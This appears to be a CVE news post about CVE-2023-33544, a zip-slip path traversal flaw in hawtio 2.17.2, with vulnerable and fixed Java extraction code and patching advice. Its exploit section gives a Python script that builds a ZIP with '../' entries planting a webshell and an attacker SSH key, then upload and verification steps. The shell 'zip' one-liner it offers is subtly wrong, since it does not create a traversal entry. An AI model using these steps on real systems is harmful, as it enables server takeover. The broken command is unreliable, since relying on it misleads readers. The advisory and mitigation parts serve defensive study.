CVE CyberSecurity Database News

CVE-2023-33544 - Path Traversal Vulnerability in Hawtio 2.17.2 Exposed via Malicious ZIP Uploads

Poster -

Hawtio is a popular open-source web console for managing Java applications. On May 31, 2023, the security community discovered a critical path traversal vulnerability (CVE-2023-33544) in hawtio version 2.17.2. Attackers can use specially crafted ZIP files to overwrite arbitrary files when the server decompresses user uploads, leading to high-severity security risks.

This post breaks down what happened, the technical details, how the exploit works, and best practices for mitigation.

What Is Path Traversal?

Path traversal is a type of vulnerability where an attacker manipulates file paths to access locations outside the intended directory. This can result in exposure, modification, or overwriting of sensitive files.

Why Is Hawtio 2.17.2 At Risk?

In version 2.17.2, hawtio accepts ZIP files (usually for uploading or updating resources). The problem is that hawtio does not sanitize paths inside the ZIP archive during extraction. This means files stored with entries such as ../../../../etc/shadow will get extracted as provided — potentially anywhere on the disk.

Exploit Scenario

Suppose a web server is running hawtio 2.17.2, and a user uploads a "malicious" ZIP file. The contents of the ZIP file are crafted so that, upon extraction, they overwrite sensitive or critical system/application files.

Consider the following structure of a malicious ZIP called evil.zip

evil.zip
|
|-- ../../../../tmp/evil.jsp
|-- ../../../../home/appuser/.ssh/authorized_keys
|-- ../../../../opt/webapp/web.xml

Because the directory traversal sequences (../) are not sanitized, hawtio will extract and overwrite:
- /tmp/evil.jsp (could be a webshell)
- /home/appuser/.ssh/authorized_keys (allowing attacker SSH access)
- /opt/webapp/web.xml (altering web application behavior)

This is a simplified pseudocode version of what hawtio does internally (in Java)

ZipInputStream zis = new ZipInputStream(uploadedFileStream);
ZipEntry entry;
while ((entry = zis.getNextEntry()) != null) {
    // Vulnerable: does not sanitize the entry name!
    File newFile = new File(targetDir, entry.getName()); 
    // ... write file to disk ...
}

A more secure file extraction would look like this

File destFile = new File(targetDir, entry.getName());
String destPath = destFile.getCanonicalPath();

if (!destPath.startsWith(targetDir.getCanonicalPath())) {
    throw new IOException("Entry is outside of the target dir: " + entry.getName());
}
// Proceed with extraction

Exploit Demonstration (Attack Steps)

Let's see how to create and upload a malicious ZIP.

On a UNIX system

mkdir evil
# Place a malicious file, e.g. webshell.jsp
cp shell.jsp evil/
cd evil
# Now create a zip with a path traversal in filename
zip ../../../../tmp/shell.jsp shell.jsp

Or using Python (for multiple files)

import zipfile

with zipfile.ZipFile('evil.zip', 'w') as zf:
    zf.writestr('../../../../tmp/shell.jsp', '<% ... webshell code ... %>')
    zf.writestr('../../../../home/appuser/.ssh/authorized_keys', '<attacker-key>')

2. Uploading the ZIP File

Upload evil.zip to the vulnerable hawtio interface by following the app's typical file upload flow.

3. After Upload

Check if your files landed on disk (e.g., SSH into the server, access /tmp/shell.jsp, etc.). If so, the attack worked.

Official References

- NVD Entry for CVE-2023-33544
- GitHub Issue (hawtio/hawtio#3542)
- hawtio.io

Immediate actions

- Upgrade hawtio to the latest version. The developers have patched the extraction routine in later releases.

Harden your servers (restrict file permissions for the hawtio process).

- Monitor and log all file uploads and new/unexpected files on disk.

Always check hawtio's official releases for patches.

Conclusion

CVE-2023-33544 is a critical reminder that path traversal vulnerabilities can have severe effects, especially in applications that process user-supplied archives. The hawtio team has released fixed versions, but all users of 2.17.2 (and possibly earlier) must patch as soon as possible.

Stay safe: always validate and sanitize file paths before extraction, and follow security best practices in your Java (or other language) web applications.


If you have more questions on CVE-2023-33544 or hawtio security, drop a comment or check the resources above!

Timeline

Published on: 06/01/2023 13:15:00 UTC
Last modified on: 06/08/2023 02:30:00 UTC